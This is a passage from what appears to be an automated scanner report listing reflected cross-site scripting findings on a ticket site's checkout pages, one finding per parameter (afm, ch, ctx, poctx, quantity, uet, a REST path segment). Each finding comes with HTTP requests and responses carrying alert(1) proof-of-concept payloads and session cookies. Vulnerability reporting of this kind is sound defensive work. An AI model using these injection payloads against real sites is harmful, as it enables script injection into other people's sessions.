Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=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%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:38:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 1065
ETag: "af793ec12b8ef7e3d482d9a63a70492e"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: bg_lvd=1311100699; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:38:19 GMT
Set-Cookie: _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlYWI2NmZiYzJkODZiNmU5YzJkZWMzM2M3ODA1MTYyMjY6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1y2huAp0RNmQY6C29mZnNldGn%2BkJ06DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%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%3D--8b58f2aa8383c776e3b27cf6770cd031eb896f39; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11928
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 415814268fdd36(a)b5a28ad72b3, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=2;lpos=0;t=bv'), fakeResult: 'none', salePrice: 49.99, roundedPrice: 50, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=n
...[SNIP]...

4.87. http://bing.fansnap.com/checkout/index/415814268 [afm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/415814268

Issue detail

The value of the afm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44bca'%3balert(1)//30702b33e3b was submitted in the afm parameter. This input was echoed as 44bca';alert(1)//30702b33e3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=44bca'%3balert(1)//30702b33e3b&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=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%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 17
ETag: "30d905cbedba4b014b953a02b8457d35"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=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%3D%3D--dcb6ed181ab99f223d61120c2acc6c104c9dca9f; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 12048
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
=2;lpos=0;t=bv'), fakeResult: 'none', salePrice: 49.99, roundedPrice: 50, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '44bca';alert(1)//30702b33e3b' });
//]]>
...[SNIP]...

4.88. http://bing.fansnap.com/checkout/index/415814268 [ch parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/415814268

Issue detail

The value of the ch request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edce3'%3balert(1)//af024862ed3 was submitted in the ch parameter. This input was echoed as edce3';alert(1)//af024862ed3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bingedce3'%3balert(1)//af024862ed3&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=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%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 144
ETag: "366b292b7a2d3acc5d4de62f74d56d95"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: ver=1; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:35:31 GMT
Set-Cookie: tvid=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: vid=; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:35:31 GMT
Set-Cookie: lvd=1311100531; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:35:31 GMT
Set-Cookie: _fancat_session=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%2FOgdscEkiAf9odHRwOi8vYmluZy5mYW5zbmFwLmNvbS9jaGVja291dC9pbmRleC80MTU4MTQyNjg%2FY3R4PWMlM0R0aXglM0JtdCUzRGludCUzQnRzcCUzRDAlM0JkdCUzRDIlM0JscG9zJTNEMCUzQnQlM0RidiZjaD1iaW5nZWRjZTMnJTNiYWxlcnQoMSkvL2FmMDI0ODYyZWQzJnF1YW50aXR5PTImbHA9dHJ1ZSZwb2N0eD1yYW5rJTNEMzYlM0JjcmF3bFNjb3JlJTNEbnVsbCUzQnBvcDElM0QwLjAzNzQlM0Jwb3AyJTNEMC4wMzc0JTNCcG9wMyUzRDAuMDM3NCUzQiYGOwdGOgxyZWZlcmVyIgGZaHR0cDovL2JpbmcuZmFuc25hcC5jb20vdTItdGlja2V0cy91Mi13aXRoLWludGVycG9sLXJlc2NoZWR1bGVkLWZyb20tNzE5L2p1bHktMjAtMjAxMS0zODk2Njk%2FdXRtX3NvdXJjZT0xOTg3JmFjaz1odHRwJTNhJTJmJTJmd3d3LmJpbmcuY29tJTJmcyUyZmFjay5odG1sOg12aXNpdF9pZGn8JAJK6zoPdmlzaXRvcl9pZCIAOg5zdHlsZV9pZHNJIgAGOwdGOghsb2N7CjsQZhozMi43ODI0OTk5OTk5OTk5OTkAj1w7EWYbLTk2LjgyMDcwMDAwMDAwMDAwMgD08TsSaRI7EyIWRGFsbGFzLUZvcnQgV29ydGg7FEAa--525fcfcbaaad5a8cd8546f8fcd40a32f01ea9edd; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 12065
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
t: false, ticketSetId: 415814268, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=2;lpos=0;t=bv'), fakeResult: 'none', salePrice: 50.0, roundedPrice: 50, split: ["2"], requestQty: false, channel: 'bingedce3';alert(1)//af024862ed3', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '' });
//]]>
...[SNIP]...

4.89. http://bing.fansnap.com/checkout/index/415814268 [ctx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/415814268

Issue detail

The value of the ctx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12b3e'%3balert(1)//136c4a6627e was submitted in the ctx parameter. This input was echoed as 12b3e';alert(1)//136c4a6627e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv12b3e'%3balert(1)//136c4a6627e&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=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%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 20
ETag: "a41f5ce3feb111485cfaee0b976315ca"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=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%2FDM%2BNBjoLb2Zmc2V0af6QnQ%3D%3D--ffe35ae5260785247f5f10915d7907d41934161c; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11936
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 415814268, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=2;lpos=0;t=bv12b3e';alert(1)//136c4a6627e'), fakeResult: 'none', salePrice: 50.0, roundedPrice: 50, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '' });
//]]>
...[SNIP]...

4.90. http://bing.fansnap.com/checkout/index/415814268 [poctx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/415814268

Issue detail

The value of the poctx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db107'%3balert(1)//a5bb0f63d2 was submitted in the poctx parameter. This input was echoed as db107';alert(1)//a5bb0f63d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3Bdb107'%3balert(1)//a5bb0f63d2&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=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%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 24
ETag: "30746182b6a26d09e669bed81318c644"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=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%3D%3D--32eff0426ea4eec8b3d79233fc816399eae3ea56; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11852
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
;tsp=0;dt=2;lpos=0;t=bv'), fakeResult: 'none', salePrice: 49.99, roundedPrice: 50, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;db107';alert(1)//a5bb0f63d2', afm: '' });
//]]>
...[SNIP]...

4.91. http://bing.fansnap.com/checkout/index/415814268 [quantity parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/415814268

Issue detail

The value of the quantity request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2bf1d%3balert(1)//47ce35f909f was submitted in the quantity parameter. This input was echoed as 2bf1d;alert(1)//47ce35f909f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=22bf1d%3balert(1)//47ce35f909f&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=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%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 18
ETag: "13eb610249b4dfb41c21ea1bea4553d6"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=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%3D%3D--be481d61e52995bc547c4772a8bd39a722dec26b; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11879
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 415814268, quantity: 22bf1d;alert(1)//47ce35f909f, ctx: escape('c=tix;mt=int;tsp=0;dt=2;lpos=0;t=bv'), fakeResult: 'none', salePrice: 49.99, roundedPrice: 50, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.03
...[SNIP]...

4.92. http://bing.fansnap.com/checkout/index/415814268 [uet parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/415814268

Issue detail

The value of the uet request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36984'%3balert(1)//221666173fb was submitted in the uet parameter. This input was echoed as 36984';alert(1)//221666173fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A38966936984'%3balert(1)//221666173fb HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=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%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 21
ETag: "42e63857998fefbd847dd56d06e79526"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=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%3D%3D--7f92d79f54616a72244ca9f33d9f5acace722a83; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11853
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
PageUet.initialize('seats-uet', '-776896836:7925:pgscheckout','','bing',{tag:'mt:int;sz:1254;id:38966936984';alert(1)//221666173fb'})
//]]>
...[SNIP]...

4.93. http://bing.fansnap.com/checkout/index/418563179 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /checkout/index/418563179

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f2db3(a)9cb2e294b58 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/418563179f2db3(a)9cb2e294b58?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 431
ETag: "ddbd0939a8f97e966f5ed29101cf1ee7"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: bg_lvd=1311100745; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:39:05 GMT
Set-Cookie: _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlZWFlMTRmYjAzZDgwZGJlOGUyNzE3N2NjY2E0MzZmNzY6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1y2huA%2BfJenAY6C29mZnNldGn%2BkJ06DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%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%3D--28b7dc6c02fdee7f14139160626eb064ce53160c; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11911
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179f2db3(a)9cb2e294b58, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;po
...[SNIP]...

4.94. http://bing.fansnap.com/checkout/index/418563179 [afm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/418563179

Issue detail

The value of the afm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 668a1'%3balert(1)//1b8fecb7052 was submitted in the afm parameter. This input was echoed as 668a1';alert(1)//1b8fecb7052 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

